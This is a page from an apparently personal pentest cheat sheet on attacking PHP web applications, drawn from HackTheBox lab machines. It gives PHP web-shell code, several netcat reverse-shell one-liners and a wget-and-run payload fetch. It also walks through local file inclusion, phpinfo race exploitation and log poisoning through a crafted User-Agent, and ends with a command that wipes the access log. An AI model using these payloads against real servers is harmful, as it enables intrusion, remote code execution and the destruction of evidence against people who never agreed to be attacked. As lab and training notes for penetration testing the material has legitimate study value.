Pentest
  • Homepage
  • Pentest Links
  • 01 Prep
    • Target Inventory
    • OSINT and Dorks
    • Recon-ng dns zone snoop
    • ❤️Gitbook
  • 02 Scan
    • *Favorites
    • Burp
    • Dirb nikto wpscan etc
    • Enum Finger and Brute SSH
    • Fuzzing
    • Nmap
    • Open Port Checks OneLiner
    • Port Knocking
    • SSL Issues
    • Tcpdump
  • 03 Getting In
    • Char Evasion Tricks
    • Email SMTP
    • Eternal Blue
    • FTP
    • heartbleed
    • Metasploit
    • MySql
    • NFS
    • Oracle
    • Postgres
    • PowerShell Empire
    • Shells
    • rpc
    • SMB Samba
    • SSH Tips
    • SQLite3
    • Veil
  • 04 WebApps
    • Apache
    • Blogs
    • Coldfusion
    • Content Management (CMS)
    • Drupal
    • Elastix FreePBX
    • HttpFileServer (HFS)
    • IIS
    • IIS6 WebDav
    • Local File Inclusion (LFI)
    • Magento
    • Nagios
    • PFSense
    • php
    • php type juggling
    • phpLite
    • Web Injections
    • Javascript
    • Shellshock
    • SQL Injections (sqli)
    • SQLMap
    • WAF
    • Webmin
    • Web Scrape
    • Wordpress
  • 05 Passwords & Ciphers
    • Cipher Decrypt
    • Cipher RSA Wiener P-Q-E
    • Cracking
    • Dict Guess List Mangle
    • Get Hashes
    • Hydra Brutes
    • Images Exif Steg
    • Malware Analysis
    • Pull Hashes PCredz
    • SSH PrivKey Passphrase
    • Unzip Crack
    • Windows PW
  • 06 Linux PrivEsc
    • 1 Look Around
    • 2 Enums
    • 3 PrivEsc
    • 4 Kernel Exploits
    • 5 Looting
    • binaries
    • Buffer Overflow
    • bash prison
    • Monitor Files
    • mongodb node
    • Pivots
    • Remote Execute
    • Shell TTY Fix
    • TAR backups
    • Transfer Files
    • vnc
  • 07 Windows PrivEsc
    • 1 Windows cmd kungfu
    • 2 Enums
    • 3 PrivEsc
    • 4 Kernel Exploits
    • 5 Looting
    • Bloodhound
    • DLL Hijack MSF
    • Kerberos
    • Memory Analysis
    • NTDS
    • Powershell
    • Responder
    • Saved Creds runas
Powered by GitBook
On this page
  • Basics
  • Reverse Shell
  • Downloading
  • php explore
  • phpinfo - fileupload - vulnerability
  • phpinfo - LFI
  • Log Poisoning

Was this helpful?

  1. 04 WebApps

php

PreviousPFSenseNextphp type juggling

Last updated 2 years ago

Was this helpful?

Basics

  • Combined with a, you can make php get you a shell

  • REF: , ninevehHTB, ,

  • Make sure to URL Encode your Injection with or

Reverse Shell

  • Two options to try:

<?php system($_GET["cmd"]); ?>               ..should work
<?php echo system($_REQUEST ["cmd"]); ?>     ..one I normally see

http://web/hi.php?notes=/../note.php&cmd=nc -e /bin/sh 10.x.x.x 4444
http://web/hi.php?notes=/../note.php&cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.x.x.x 4444 > /tmp/f

Downloading

<?php system("wget $IP/shell.php -O /tmp/shell.php; php /tmp/shell.php"); ?>

php explore

  • REF: poisonHTB

https://$IP/phpinfo.php                 ..Found: file_uploads 'On'
https://$IP/browse.php                  ..page can run local php scripts
https://$IP/browse.php?file=Hello       ..fail
https://$IP/browse.php?file=index.php   ..ok

Encode to view Source:
https://$IP/browse.php?file=php://filter/convert.base64-encode/resource=index.php   ..encodes b64
echo PD9waHAKcHJ.. | base64 -d  ..<?php print_r(ini_get_all());?>

https://$IP/browse.php?file=http://$MyIP/Anyfile   ..http wrapper disabled
https://$IP/browse.php?file=ftp://$MyIP/Anyfile    ..ftp wrapper disabled
https://$IP/browse.php?file=expect://ls            ..unable to find wrapper
https://$IP/browse.php?file=/etc/passwd            ..ok (found username)

phpinfo - fileupload - vulnerability

  • Check options for: phpinfo.php

  • If 'fileupload = ON' - it will receive any files you send.

  • php will save them to a cache directory (normally not available to users)

  • But with an LFI you may get code-execution

  • Test with Burp Intercept:

POST /phpinfo.php HTTP/1.1   
Content-Type: multipart/form-data; boundary=--HelloWorld

----HelloWorld
Content-Disposition: form-data; name="blah"; filename="TestFile"
Content-Type: text/plain
Does this work
----HelloWorld

View phpinfo results to see if our file was accepted:
"PHP Variables"            ..header
_FILES("blah")             ..found!

phpinfo - LFI

---------------------
---------------------
Replace the PAYLOAD with a full reverse-payload
PAYLOAD="""$s\r<?php...;?> \r""" % TAG
(keep all the weird bits.. just focus on swapping the php line
<?php...;?>

---------------------
---------------------
locate php-reverse
php-reverse-shell.php
paste into phpinfolfi.py as 'payload'
<?php...?>
update ip, port
del comments
LFIREQ="""GET... /browse.php?file=%s HTTP/1.1\r
i = d.find("[tmp_name] =>")    ..problem
i = d.find("[tmp_name] =&gt")  ..fixed twice in script

---------------------
---------------------
python phpinfolfi.py $IP 80 100
.. port 80
.. threads 100

nc -nvlp 9001  ..got a shell

Log Poisoning

  • Submit an evil log entry (custom User-Agent)

  • Execute it Viewing the log with an LFI

  • If php tags are 'hidden' then they are interpreted, and we can inject our payload

TEST 1

View Log:
https://$IP/browse.php > /var/log/httpd-access.log
curl https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log

Burp > Repeater > Custom "User-Agent"
https://$IP/doesntmatter
User-Agent: Hello World

Confirm:
Notice "Hello World" was sent as the User-Agent
We have control over this field, and we can send malicious payload here
TEST 2

Burp > Repeater > Custom "User-Agent"
https://$IP/doesntmatter
User-Agent: <?php echo('Hello World'); ?>

https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log
We see "Hello World" in the log
php-tags were read (ie: dont see them written in plain-text)
Meaning we have execution!
EXPLOIT

Burp > Repeater > Custom "User-Agent"
GET /doesntmatter HTTP/1.1
User-Agent: <?php system($_REQUEST['cmd']) ?>

https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log
https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=hostname
https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=ls -la
https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=uname -a
https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i|nc 10.x.x.x 4444 >/tmp/f
(might need burp url-encode)

nc -nvlp 4444  ..connected!
bsd reverse netcat
bsd doesnt like the 'normal' reverse

normal:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.x.x.x 9002 >/tmp/f

bsd version:
mkfifo /tmp/f;cat /tmp/f|/bin/sh -i |nc 10.x.x.x 4444 >/tmp/f            ..ippsec
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i|nc 10.x.x.x 4444 >/tmp/f   ..maybe
Log issue:

vi /var/log/httpd-access.log
delete our bad-line from earlier mistake, oops
because we used echo "Hello World" with double-quotes

Wipe the log file:
echo "" > httpd-access.log

Github > > FileInclusion > phpinfolfi.py

REF: , poisonHTB

https://insomniasec.com/cdn-assets/LFI_With_PHPInfo_Assistance.pdf
PayloadAllTheThings
php
Local File Inclusion
phpLite
WebInjections
MeyerWeb
ReverseShells
Burp